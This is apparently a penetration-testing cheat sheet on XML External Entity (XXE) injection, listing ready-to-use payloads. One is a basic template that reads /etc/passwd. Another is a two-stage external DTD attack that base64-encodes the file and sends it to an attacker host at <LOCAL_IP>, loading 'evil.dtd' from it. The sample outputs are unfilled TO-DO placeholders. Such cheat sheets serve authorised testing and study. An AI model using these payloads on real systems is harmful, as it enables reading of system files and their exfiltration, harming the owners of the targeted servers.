XXE (XML External Entity)

Web Exploitation
XXE
Xml
Dtd
Web
Remote File Inclusion
Data Exfiltration

Usage Tips:

Click on a keyword to enable inline editing.
Click inside a code block to copy (excludes comments).
Use the button to view examples.
Click outside to collapse all examples.

XXE Template


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY data SYSTEM "/etc/passwd">]>
<product>
    <id>&data;</id>
    <price></price>
</product>
Sample Output:
TO-DO

External DTD (2 stage)


<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % eval "<!ENTITY exfil SYSTEM 'http://<LOCAL_IP>/data?%data;'>">
Sample Output:
TO-DO


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
    <!ENTITY % bar SYSTEM "http://<LOCAL_IP>/evil.dtd">
        %bar;
        %eval;
]>
<product>
    <id>&exfil;</id>
    <price></price>
</product>
Sample Output:
TO-DO